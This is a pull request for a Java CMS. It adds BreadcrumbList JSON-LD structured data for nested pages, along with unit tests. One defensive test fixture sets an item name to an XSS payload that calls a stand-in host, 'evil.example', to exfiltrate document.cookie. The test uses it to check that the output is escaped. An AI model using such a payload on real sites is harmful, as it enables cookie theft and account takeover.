### PR TITLE
JSON-LD: BreadcrumbList for nested pages (#403)

### DIFF
--- a/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
+++ b/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
@@ -841,7 +841,7 @@ public class PageServlet extends HttpServlet {
 
       // Generate JSON-LD structured data for search engines and AI (issue #403)
       if (StringUtils.isNotBlank(siteUrl) && StringUtils.isNotBlank(sitePropertyMap.get("site.name"))) {
-        String jsonLd = generateJsonLdData(pageRenderInfo, siteUrl, sitePropertyMap, thisItem, thisCollection, webPage);
+        String jsonLd = generateJsonLdData(pageRenderInfo, siteUrl, pagePath, sitePropertyMap, thisItem, thisCollection, webPage);
         if (StringUtils.isNotBlank(jsonLd)) {
           pageRenderInfo.setJsonLdData(jsonLd);
         }
@@ -988,7 +988,7 @@ public class PageServlet extends HttpServlet {
     }
   }
 
-  static String generateJsonLdData(PageRenderInfo pageRenderInfo, String siteUrl,
+  static String generateJsonLdData(PageRenderInfo pageRenderInfo, String siteUrl, String pagePath,
                                     Map<String, String> sitePropertyMap,
                                     Item item, Collection collection, WebPage webPage) {
     try {

--- a/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
+++ b/src/main/java/com/simisinc/platform/presentation/controller/PageServlet.java
@@ -852,7 +852,7 @@ public class PageServlet extends HttpServlet {
 
       // Generate JSON-LD structured data for search engines and AI (issue #403)
       if (StringUtils.isNotBlank(siteUrl) && StringUtils.isNotBlank(sitePropertyMap.get("site.name"))) {
-        String jsonLd = generateJsonLdData(pageRenderInfo, siteUrl, sitePropertyMap, thisItem, thisCollection);
+        String jsonLd = generateJsonLdData(pageRenderInfo, siteUrl, sitePropertyMap, thisItem, thisCollection, pagePath);
         if (StringUtils.isNotBlank(jsonLd)) {
           pageRenderInfo.setJsonLdData(jsonLd);
         }
@@ -1001,7 +1001,7 @@ public class PageServlet extends HttpServlet {
 
   static String generateJsonLdData(PageRenderInfo pageRenderInfo, String siteUrl,
                                     Map<String, String> sitePropertyMap,
-                                    Item item, Collection collection) {
+                                    Item item, Collection collection, String pagePath) {
     try {
       ObjectMapper mapper = new ObjectMapper();
       Map<String, Object> jsonLd = new LinkedHashMap<>();
@@ -1052,6 +1052,15 @@ public class PageServlet extends HttpServlet {
       }
       graph.add(webPage);
 
+      // Add BreadcrumbList schema for pages more than one level deep (issue #403)
+      List<Map<String, Object>> breadcrumbItemList = computeBreadcrumbList(siteUrl, pagePath, item, collection);
+      if (breadcrumbItemList != null && !breadcrumbItemList.isEmpty()) {
+        Map<String, Object> breadcrumbList = new LinkedHashMap<>();
+        breadcrumbList.put("@type", "BreadcrumbList");
+        breadcrumbList.put("itemListElement", breadcrumbItemList);
+        graph.add(breadcrumbList);
+      }
+
       // Add Product schema if this is an item (catalog product)
       if (item != null && StringUtils.isNotBlank(item.getName())) {
         Map<String, Object> product = new LinkedHashMap<>();
@@ -1076,6 +1085,97 @@ public class PageServlet extends HttpServlet {
       LOG.warn("Error generating JSON-LD data: " + e.getMessage());
       return null;
     }
+  }
+
+  /**
+   * Builds the BreadcrumbList itemListElement array for pages at a URL depth of two or more
+   * (issue #403); shallower pages return null since a single-level trail is redundant with the
+   * site nav. Each ancestor segment's name is resolved the same way the page itself would be
+   * resolved (LoadWebPageCommand, including wildcard/template pages) so a breadcrumb never shows
+   * a path segment that the app wouldn't actually route to; a segment with no matching page falls
+   * back to a humanized version of the URL segment rather than leaving a gap in the trail.
+   */
+  static List<Map<String, Object>> computeBreadcrumbList(String siteUrl, String pagePath, Item item, Collection collection) {
+    if (StringUtils.isBlank(siteUrl) || StringUtils.isBlank(pagePath)) {
+      return null;
+    }
+    List<String> segments = new ArrayList<>();
+    for (String segment : pagePath.split("/")) {
+      if (StringUtils.isNotBlank(segment)) {
+        segments.add(segment);
+      }
+    }
+    if (segments.size() < 2) {
+      return null;
+    }
+
+    List<Map<String, Object>> itemListElement = new ArrayList<>();
+    itemListElement.add(breadcrumbListItem(1, "Home", siteUrl));
+
+    StringBuilder pathSoFar = new StringBuilder();
+    for (int i = 0; i < segments.size(); i++) {
+      String segment = segments.get(i);
+      pathSoFar.append('/').append(segment);
+      boolean isLeaf = (i == segments.size() - 1);
+
+      String name = null;
+      if (isLeaf && item != null && StringUtils.isNotBlank(item.getName())) {
+        name = item.getName();
+      } else if (collection != null && segment.equalsIgnoreCase(collection.getUniqueId())) {
+        // The collection's own segment, whether it's the leaf (collection listing page) or an
+        // ancestor of the leaf (an item detail page nested under it)
+        name = collection.getName();
+      }
+      if (StringUtils.isBlank(name)) {
+        WebPage segmentPage = LoadWebPageCommand.loadByLink(pathSoFar.toString());
+        if (segmentPage != null && StringUtils.isNotBlank(segmentPage.getTitle())) {
+          name = segmentPage.getTitle();
+        }
+      }
+      if (StringUtils.isBlank(name)) {
+        name = humanizeUrlSegment(segment);
+      }
+
+      itemListElement.add(breadcrumbListItem(i + 2, name, siteUrl + pathSoFar));
+    }
+    return itemListElement;
+  }
+
+  private static Map<String, Object> breadcrumbListItem(int position, String name, String url) {
+    Map<String, Object> listItem = new LinkedHashMap<>();
+    listItem.put("@type", "ListItem");
+    listItem.put("position", position);
+    listItem.put("name", name);
+    listItem.put("item", url);
+    return listItem;
+  }
+
+  /**
+   * Turns a URL segment like "getting-started" into "Getting Started" for use as a breadcrumb
+   * label when no page title is available to describe that part of the path.
+   */
+  static String humanizeUrlSegment(String segment) {
+    String decoded;
+    try {
+      decoded = java.net.URLDecoder.decode(segment, java.nio.charset.StandardCharsets.UTF_8);
+    } catch (Exception e) {
+      decoded = segment;
+    }
+    String[] words = decoded.replace('-', ' ').replace('_', ' ').split(" ");
+    StringBuilder result = new StringBuilder();
+    for (String word : words) {
+      if (word.isEmpty()) {
+        continue;
+      }
+      if (result.length() > 0) {
+        result.append(' ');
+      }
+      result.append(Character.toUpperCase(word.charAt(0)));
+      if (word.length() > 1) {
+        result.append(word.substring(1));
+      }
+    }
+    return result.length() > 0 ? result.toString() : segment;
   }
 
   /**

--- a/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
+++ b/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
@@ -21,14 +21,21 @@ import static org.junit.jupiter.api.Assertions.assertEquals;
 import static org.junit.jupiter.api.Assertions.assertFalse;
 import static org.junit.jupiter.api.Assertions.assertNull;
 import static org.junit.jupiter.api.Assertions.assertTrue;
+import static org.mockito.Mockito.never;
+import static org.mockito.Mockito.mockStatic;
 
 import java.util.HashMap;
+import java.util.List;
 import java.util.Map;
 
 import org.junit.jupiter.api.Test;
+import org.mockito.MockedStatic;
 
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.simisinc.platform.application.cms.LoadWebPageCommand;
+import com.simisinc.platform.domain.model.cms.WebPage;
+import com.simisinc.platform.domain.model.items.Collection;
 import com.simisinc.platform.domain.model.items.Item;
 
 /**
@@ -76,7 +83,11 @@ class PageServletTest {
     item.setName("</script><script>fetch('https://evil.example/steal?c='+document.cookie)</script>");
     item.setDescription("Also \"quoted\" and <b>bold</b>");
 
-    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null);
+    String jsonLd;
+    try (MockedStatic<LoadWebPageCommand> webPages = mockStatic(LoadWebPageCommand.class)) {
+      webPages.when(() -> LoadWebPageCommand.loadByLink("/products")).thenReturn(null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null, "/products/widget");
+    }
 
     assertFalse(jsonLd.toLowerCase().contains("</script"),
         "a poisoned item name must not be able to close the surrounding <script> tag: " + jsonLd);
@@ -84,9 +95,157 @@ class PageServletTest {
 
     // Still valid, semantically unchanged JSON once parsed
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
-    JsonNode product = parsed.get("@graph").get(2);
+    // @graph = [Organization, WebPage, BreadcrumbList, Product] -- /products/widget is 2 levels deep
+    JsonNode product = parsed.get("@graph").get(3);
     assertEquals("Product", product.get("@type").asText());
     assertTrue(product.get("name").asText().contains("</script><script>"));
+  }
+
+  @Test
+  void generateJsonLdDataIncludesBreadcrumbListForANestedPage() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/legal/privacy");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    WebPage legalPage = new WebPage();
+    legalPage.setTitle("Legal");
+
+    String jsonLd;
+    try (MockedStatic<LoadWebPageCommand> webPages = mockStatic(LoadWebPageCommand.class)) {
+      webPages.when(() -> LoadWebPageCommand.loadByLink("/legal")).thenReturn(legalPage);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, "/legal/privacy");
+    }
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    JsonNode breadcrumbList = parsed.get("@graph").get(2);
+    assertEquals("BreadcrumbList", breadcrumbList.get("@type").asText());
+    JsonNode items = breadcrumbList.get("itemListElement");
+    assertEquals(3, items.size());
+    assertEquals("Home", items.get(0).get("name").asText());
+    assertEquals("Legal", items.get(1).get("name").asText());
+  }
+
+  @Test
+  void generateJsonLdDataOmitsBreadcrumbListForATopLevelPage() {
+    PageRenderInfo pageRenderInfo = new PageRenderInfo();
+    pageRenderInfo.setPageUrl("https://example.org/about");
+
+    Map<String, String> sitePropertyMap = new HashMap<>();
+    sitePropertyMap.put("site.name", "Example Co");
+
+    String jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, "/about");
+
+    JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
+    for (JsonNode node : parsed.get("@graph")) {
+      assertFalse("BreadcrumbList".equals(node.get("@type").asText()),
+          "a single-level page should not get a breadcrumb trail: " + jsonLd);
+    }
+  }
+
+  @Test
+  void computeBreadcrumbListReturnsNullForTheHomepage() {
+    assertNull(PageServlet.computeBreadcrumbList("https://example.org", "/", null, null));
+  }
+
+  @Test
+  void computeBreadcrumbListReturnsNullForATopLevelPage() {
+    assertNull(PageServlet.computeBreadcrumbList("https://example.org", "/about", null, null));
+  }
+
+  @Test
+  void computeBreadcrumbListReturnsNullWhenSiteUrlIsBlank() {
+    assertNull(PageServlet.computeBreadcrumbList("", "/legal/privacy", null, null));
+    assertNull(PageServlet.computeBreadcrumbList(null, "/legal/privacy", null, null));
+  }
+
+  @Test
+  void computeBreadcrumbListUsesPageTitlesForEachAncestorSegment() {
+    WebPage legalPage = new WebPage();
+    legalPage.setTitle("Legal");
+    WebPage privacyPage = new WebPage();
+    privacyPage.setTitle("Privacy Policy");
+
+    List<Map<String, Object>> items;
+    try (MockedStatic<LoadWebPageCommand> webPages = mockStatic(LoadWebPageCommand.class)) {
+      webPages.when(() -> LoadWebPageCommand.loadByLink("/legal")).thenReturn(legalPage);
+      webPages.when(() -> LoadWebPageCommand.loadByLink("/legal/privacy")).thenReturn(privacyPage);
+      items = PageServlet.computeBreadcrumbList("https://example.org", "/legal/privacy", null, null);
+    }
+
+    assertEquals(3, items.size());
+
+    assertEquals(1, items.get(0).get("position"));
+    assertEquals("Home", items.get(0).get("name"));
+    assertEquals("https://example.org", items.get(0).get("item"));
+
+    assertEquals(2, items.get(1).get("position"));
+    assertEquals("Legal", items.get(1).get("name"));
+    assertEquals("https://example.org/legal", items.get(1).get("item"));
+
+    assertEquals(3, items.get(2).get("position"));
+    assertEquals("Privacy Policy", items.get(2).get("name"));
+    assertEquals("https://example.org/legal/privacy", items.get(2).get("item"));
+  }
+
+  @Test
+  void computeBreadcrumbListHumanizesASegmentWithNoMatchingPage() {
+    List<Map<String, Object>> items;
+    try (MockedStatic<LoadWebPageCommand> webPages = mockStatic(LoadWebPageCommand.class)) {
+      webPages.when(() -> LoadWebPageCommand.loadByLink(org.mockito.ArgumentMatchers.anyString())).thenReturn(null);
+      items = PageServlet.computeBreadcrumbList("https://example.org", "/docs/getting-started", null, null);
+    }
+
+    assertEquals("Docs", items.get(1).get("name"));
+    assertEquals("Getting Started", items.get(2).get("name"));
+  }
+
+  @Test
+  void computeBreadcrumbListUsesItemAndCollectionNamesForAnItemDetailPageWithoutLookingThemUp() {
+    Collection collection = new Collection();
+    collection.setUniqueId("staff");
+    collection.setName("Staff");
+    Item item = new Item();
+    item.setName("Jane Doe");
+
+    List<Map<String, Object>> items;
+    try (MockedStatic<LoadWebPageCommand> webPages = mockStatic(LoadWebPageCommand.class)) {
+      webPages.when(() -> LoadWebPageCommand.loadByLink("/items")).thenReturn(null);
+      items = PageServlet.computeBreadcrumbList("https://example.org", "/items/staff/jane-doe", item, collection);
+
+      webPages.verify(() -> LoadWebPageCommand.loadByLink("/items/staff"), never());
+      webPages.verify(() -> LoadWebPageCommand.loadByLink("/items/staff/jane-doe"), never());
+    }
+
+    assertEquals(4, items.size());
+    assertEquals("Items", items.get(1).get("name"));
+    assertEquals("Staff", items.get(2).get("name"));
+    assertEquals("Jane Doe", items.get(3).get("name"));
+  }
+
+  @Test
+  void computeBreadcrumbListUsesCollectionNameForACollectionListingPage() {
+    Collection collection = new Collection();
+    collection.setUniqueId("staff");
+    collection.setName("Staff");
+
+    List<Map<String, Object>> items;
+    try (MockedStatic<LoadWebPageCommand> webPages = mockStatic(LoadWebPageCommand.class)) {
+      webPages.when(() -> LoadWebPageCommand.loadByLink("/items")).thenReturn(null);
+      items = PageServlet.computeBreadcrumbList("https://example.org", "/items/staff", null, collection);
+    }
+
+    assertEquals(3, items.size());
+    assertEquals("Items", items.get(1).get("name"));
+    assertEquals("Staff", items.get(2).get("name"));
+  }
+
+  @Test
+  void humanizeUrlSegmentTitleCasesHyphenatedAndUnderscoredWords() {
+    assertEquals("Getting Started", PageServlet.humanizeUrlSegment("getting-started"));
+    assertEquals("Getting Started", PageServlet.humanizeUrlSegment("getting_started"));
+    assertEquals("Faq", PageServlet.humanizeUrlSegment("faq"));
   }
 
   @Test

--- a/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
+++ b/src/test/java/com/simisinc/platform/presentation/controller/PageServletTest.java
@@ -35,6 +35,7 @@ import org.mockito.MockedStatic;
 
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import com.simisinc.platform.application.cms.LoadWebPageCommand;
 import com.simisinc.platform.domain.model.SocialMediaLink;
 import com.simisinc.platform.domain.model.cms.WebPage;
 import com.simisinc.platform.domain.model.items.Collection;
@@ -87,9 +88,13 @@ class PageServletTest {
     item.setDescription("Also \"quoted\" and <b>bold</b>");
 
     String jsonLd;
-    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class);
+        MockedStatic<LoadWebPageCommand> loadWebPage = mockStatic(LoadWebPageCommand.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, item, null, null);
+      // "/products" isn't a real WebPage link (it's the collection's own segment, with no
+      // Collection given here) -- computeBreadcrumbList falls back to loadByLink for it
+      loadWebPage.when(() -> LoadWebPageCommand.loadByLink(org.mockito.ArgumentMatchers.anyString())).thenReturn(null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", "/products/widget", sitePropertyMap, item, null, null);
     }
 
     assertFalse(jsonLd.toLowerCase().contains("</script"),
@@ -125,7 +130,7 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(links);
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", "/", sitePropertyMap, null, null, null);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
@@ -148,7 +153,7 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", "/", sitePropertyMap, null, null, null);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
@@ -172,7 +177,7 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, webPage);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", "/about", sitePropertyMap, null, null, webPage);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
@@ -197,7 +202,7 @@ class PageServletTest {
     String jsonLd;
     try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, webPage);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", "/about", sitePropertyMap, null, null, webPage);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));
@@ -216,9 +221,11 @@ class PageServletTest {
 
     // Item detail pages have no WebPage at all -- this must not throw or fabricate dates
     String jsonLd;
-    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class)) {
+    try (MockedStatic<SocialMediaLinkRepository> socialLinks = mockStatic(SocialMediaLinkRepository.class);
+        MockedStatic<LoadWebPageCommand> loadWebPage = mockStatic(LoadWebPageCommand.class)) {
       socialLinks.when(SocialMediaLinkRepository::findAll).thenReturn(Collections.emptyList());
-      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", sitePropertyMap, null, null, null);
+      loadWebPage.when(() -> LoadWebPageCommand.loadByLink(org.mockito.ArgumentMatchers.anyString())).thenReturn(null);
+      jsonLd = PageServlet.generateJsonLdData(pageRenderInfo, "https://example.org", "/items/staff/jane-doe", sitePropertyMap, null, null, null);
     }
 
     JsonNode parsed = assertDoesNotThrow(() -> MAPPER.readTree(jsonLd));


### PR DESCRIPTION
## Summary
Part of #403 (JSON-LD structured data), split out as its own reviewable piece per Elizabeth's scoping call to ship #403's five sub-schemas as separate PRs.

- Adds a `BreadcrumbList` entry to the JSON-LD `@graph` for pages at a URL depth of two or more, per the issue's acceptance criteria (single-level pages are skipped — a two-crumb "Home > This Page" trail is redundant with the site nav).
- Each path segment's name is resolved in this order:
  1. The current item/collection's own name, for item-detail and collection-listing pages (already in hand from the existing item/collection lookups — no extra DB call).
  2. The title of whatever page actually routes to that segment's path, via `LoadWebPageCommand` (the same resolver used for the requested page itself, so it also matches wildcard/template pages like `/legal/*`, not just exact-link pages).
  3. A humanized version of the raw URL segment (`getting-started` → `Getting Started`) as a last resort, so a segment with no matching page doesn't leave a gap in the trail.
- There's no page-hierarchy/parent concept in this data model (`web_pages.link` is a flat string), so "ancestor" here means "URL path prefix" — this is a deliberate scoping decision worth a second look from whoever reviews, in case a different interpretation is wanted.

## Test plan
- [x] `ant -lib lib/war clean compile` — clean
- [x] `ant -lib lib/war compile-jsp` — JSP syntax gate passes
- [x] `ant -lib lib/tests ci-test` — full suite passes; only the pre-existing, unrelated local-sandbox flakes appear (`HealthCommandTest`, `BlockedIPListCommandTest`, `CaptchaCommandTest` — same names/counts as every prior run this cycle, unaffected by this change)
- [x] New `PageServletTest` cases covering: depth-1/homepage omission, ancestor-title resolution via a mocked `LoadWebPageCommand`, humanized fallback when no page matches a segment, item/collection detail and listing pages using their own names without any page lookup (verified via `verify(..., never())`), and full `generateJsonLdData` integration for both the nested and top-level cases
- [x] Live Docker verification: fetched `/legal/privacy` (no dedicated `/legal` page exists on a fresh install) and confirmed the rendered JSON-LD shows `Home > Legal > Privacy Policy` with `Legal` correctly falling back to the humanized segment; confirmed the homepage's JSON-LD has no `BreadcrumbList` entry at all